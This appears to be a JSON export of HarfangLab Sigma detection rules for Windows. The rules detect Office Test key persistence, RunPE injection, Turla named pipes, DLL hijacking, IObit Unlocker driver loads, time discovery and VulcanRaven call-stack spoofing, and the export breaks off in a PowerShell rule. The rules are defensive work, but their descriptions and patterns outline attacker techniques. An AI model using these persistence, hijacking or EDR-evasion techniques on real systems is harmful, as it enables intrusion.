"content": "title: Microsoft Office Test Key Created\nid: 79ab02be-b5f1-4e8e-a6c0-279428aa8529\ndescription: |\n Detects the creation or modification of the Office Test key.\n Test keys are used internally by Microsoft while developing Office and should never be set in normal circumstances.\n Office Test registry keys can be used to force Microsoft Office to load DLLs pointed to by the Windows registry and therefore act as a persistence mechanism.\n It is recommended to investigate the process that set the registry value for suspicious activities as well as to analyze the file pointed to by the registry value for malicious content.\n It is also recommended to investigate unsigned DLLs loaded by winword.exe with the name matching the registry value and malicious behaviors performed by winword.exe to determine if the persistence mechanism succeeded.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\n - https://attack.mitre.org/techniques/T1137/002/\ndate: 2021/06/24\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType:\n - 'CreateKey'\n - 'CreateValue'\n - 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\Software\\Microsoft\\Office test\\Special\\Perf\\\\*'\n - 'HKLM\\Software\\Microsoft\\Office test\\Special\\Perf\\\\*'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - '\\msiexec.exe'\n Details:\n - '?:\\Program Files (x86)\\Microsoft Readiness Toolkit for Office\\Usage365.dll'\n - '?:\\Program Files (x86)\\Microsoft Readiness Toolkit for Office\\x64\\Usage365.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79ab02be-b5f1-4e8e-a6c0-279428aa8529",
"rule_name": "Microsoft Office Test Key Created",
"rule_description": "Detects the creation or modification of the Office Test key.\nTest keys are used internally by Microsoft while developing Office and should never be set in normal circumstances.\nOffice Test registry keys can be used to force Microsoft Office to load DLLs pointed to by the Windows registry and therefore act as a persistence mechanism.\nIt is recommended to investigate the process that set the registry value for suspicious activities as well as to analyze the file pointed to by the registry value for malicious content.\nIt is also recommended to investigate unsigned DLLs loaded by winword.exe with the name matching the registry value and malicious behaviors performed by winword.exe to determine if the persistence mechanism succeeded.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79c0c417-e8bb-4ab6-9850-abefe4d3b50d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070302Z",
"creation_date": "2026-03-23T11:45:34.070305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070309Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@coormac/hta-to-net-dll-s-malware-analysis-b7170574331d",
"https://www.virustotal.com/gui/file/132ff32cdc874b28698160c4af6fd87d08c236727d8a952ad3b002d887b209bf",
"https://www.virustotal.com/gui/file/11c215cb0e3ce441efd48d331622dcb714af2e2349b81da8368f5e2f7ad1c951"
],
"name": "t1055_suspicious_runpe_injection.yml",
"content": "title: Suspicious RunPE Injection\nid: 79c0c417-e8bb-4ab6-9850-abefe4d3b50d\ndescription: |\n Detects a suspicious command-line indicative of the RunPE technique used to inject and execute a Portable Executable (PE) file within the memory space of a newly created process.\n This behavior involves creating a suspended process, allocating memory, writing PE headers and sections into the target process, and modifying the thread context to redirect execution.\n This is a common technique used by malware to evade detection and run payloads reflectively in memory.\n Note that this rule matches a literal command-line marker observed in the referenced samples rather than the injection primitives themselves, so variants that omit or change this marker will not be detected.\n It is recommended to investigate the parent process to determine legitimacy as well as to look for other malicious actions on the host.\nreferences:\n - https://medium.com/@coormac/hta-to-net-dll-s-malware-analysis-b7170574331d\n - https://www.virustotal.com/gui/file/132ff32cdc874b28698160c4af6fd87d08c236727d8a952ad3b002d887b209bf\n - https://www.virustotal.com/gui/file/11c215cb0e3ce441efd48d331622dcb714af2e2349b81da8368f5e2f7ad1c951\ndate: 2025/05/16\nmodified: 2025/06/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '#by-unknown'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79c0c417-e8bb-4ab6-9850-abefe4d3b50d",
"rule_name": "Suspicious RunPE Injection",
"rule_description": "Detects a suspicious command-line indicative of the RunPE technique used to inject and execute a Portable Executable (PE) file within the memory space of a newly created process.\nThis behavior involves creating a suspended process, allocating memory, writing PE headers and sections into the target process, and modifying the thread context to redirect execution.\nThis is a common technique used by malware to evade detection and run payloads reflectively in memory.\nNote that this rule matches a literal command-line marker observed in the referenced samples rather than the injection primitives themselves, so variants that omit or change this marker will not be detected.\nIt is recommended to investigate the parent process to determine legitimacy as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2025-05-16",
"rule_modified_date": "2025-06-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79c1dbfa-d090-429f-85e6-f45fbbbfa7ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609220Z",
"creation_date": "2026-03-23T11:45:34.609224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609231Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
"https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_turla_named_pipe_connection.yml",
"content": "title: Named Pipe Connection linked to Turla\nid: 79c1dbfa-d090-429f-85e6-f45fbbbfa7ab\ndescription: |\n Detects the creation of, or connection to, a named pipe whose name is attributed to the Turla threat group.\n The Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\n It is recommended to identify the process that created or connected to the pipe and to monitor for any subsequent lateral movement alerts.\nreferences:\n - https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf\n - https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/07/11\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.Turla\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\sdlrpc'\n - '\\comnap'\n - '\\iehelper'\n - '\\userpipe'\n - '\\atctl'\n\n condition: selection\nlevel: high\n#level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79c1dbfa-d090-429f-85e6-f45fbbbfa7ab",
"rule_name": "Named Pipe Connection linked to Turla",
"rule_description": "Detects the creation of, or connection to, a named pipe whose name is attributed to the Turla threat group.\nThe Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\nIt is recommended to identify the process that created or connected to the pipe and to monitor for any subsequent lateral movement alerts.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79dbc640-7be1-4fe3-8549-f832dde6e9dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589024Z",
"creation_date": "2026-03-23T11:45:34.589027Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589035Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://twitter.com/falsneg/status/1581769422296883200",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_phoneactivate.yml",
"content": "title: DLL Hijacking via phoneactivate.exe\nid: 79dbc640-7be1-4fe3-8549-f832dde6e9dd\ndescription: |\n Detects potential Windows DLL Hijacking via phoneactivate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://twitter.com/falsneg/status/1581769422296883200\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'phoneactivate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\rasty_jitter64.dll'\n - '\\rsaenh.dll'\n - '\\slc.dll'\n - '\\sppcext.dll'\n - '\\windows.ui.immersive.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79dbc640-7be1-4fe3-8549-f832dde6e9dd",
"rule_name": "DLL Hijacking via phoneactivate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via phoneactivate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79f2b027-0261-441e-a1d1-d569515a7c9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086219Z",
"creation_date": "2026-03-23T11:45:34.086221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_iobitunlocker_driver.yml",
"content": "title: IObit Unlocker Driver Loaded\nid: 79f2b027-0261-441e-a1d1-d569515a7c9b\ndescription: |\n Detects the loading of the IObit Unlocker driver.\n IObit Unlocker is a free utility that allows the removal of files and folders that are currently locked by the system because they are in use by another program or resource.\n Adversaries may use this tool to modify and/or disable security tools and avoid detection of their malicious actions.\n It is recommended to check if the driver is expected to be loaded on this machine and to look for other suspicious actions on the host.\n Note that this rule matches on the driver file name only; when triaging, also verify the driver's signer and hash.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79f2b027-0261-441e-a1d1-d569515a7c9b",
"rule_name": "IObit Unlocker Driver Loaded",
"rule_description": "Detects the loading of the IObit Unlocker driver.\nIObit Unlocker is a free utility that allows the removal of files and folders that are currently locked by the system because they are in use by another program or resource.\nAdversaries may use this tool to modify and/or disable security tools and avoid detection of their malicious actions.\nIt is recommended to check if the driver is expected to be loaded on this machine and to look for other suspicious actions on the host.\nNote that this rule matches on the driver file name only; when triaging, also verify the driver's signer and hash.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79f83292-015d-4a28-8506-63731c5b8f83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605515Z",
"creation_date": "2026-03-23T11:45:34.605519Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605526Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1124/"
],
"name": "t1124_system_time_discovery_with_net.yml",
"content": "title: System Time Discovered via net.exe\nid: 79f83292-015d-4a28-8506-63731c5b8f83\ndescription: |\n Detects the execution of net1.exe with the time option.\n Adversaries can use this command during the discovery phase to get the current time on the target system.\n It is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\n If this action is legitimate and recurrent, it is highly recommended to create a whitelist for certain machines or parent scripts.\nreferences:\n - https://attack.mitre.org/techniques/T1124/\ndate: 2022/12/01\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1124\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|contains: ' time'\n\n exclusion_set:\n CommandLine|contains: ' /set'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79f83292-015d-4a28-8506-63731c5b8f83",
"rule_name": "System Time Discovered via net.exe",
"rule_description": "Detects the execution of net1.exe with the time option.\nAdversaries can use this command during the discovery phase to get the current time on the target system.\nIt is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\nIf this action is legitimate and recurrent, it is highly recommended to create a whitelist for certain machines or parent scripts.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1124"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7a38622a-a464-4772-8ad7-6a4af058f902",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586317Z",
"creation_date": "2026-03-23T11:45:34.586322Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via TpmVscMgrSvr.exe\nid: 7a38622a-a464-4772-8ad7-6a4af058f902\ndescription: |\n Detects potential Windows DLL Hijacking via TpmVscMgrSvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TpmVscMgrSvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7a38622a-a464-4772-8ad7-6a4af058f902",
"rule_name": "DLL Hijacking via TpmVscMgrSvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TpmVscMgrSvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7aa1a4f9-41af-4cd0-ad9a-4f846568bb24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070103Z",
"creation_date": "2026-03-23T11:45:34.070105Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_inj_thr_callstack_spoofing_vulcan_raven.yml",
"content": "title: Spoofed Injected Thread Call Stack Related to VulcanRaven\nid: 7aa1a4f9-41af-4cd0-ad9a-4f846568bb24\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: injected_thread\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n - 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 
'lsm.dll'\n - 'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7aa1a4f9-41af-4cd0-ad9a-4f846568bb24",
"rule_name": "Spoofed Injected Thread Call Stack Related to VulcanRaven",
"rule_description": "Detects arbitrary call stacks related to the VulcanRaven PoC.\nVulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions; it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084832Z",
"creation_date": "2026-03-23T11:45:34.084834Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084839Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command",
"https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel",
"https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/010/"
],
"name": "t1059_001_powershell_suspicious_getcommand_cmdlet.yml",
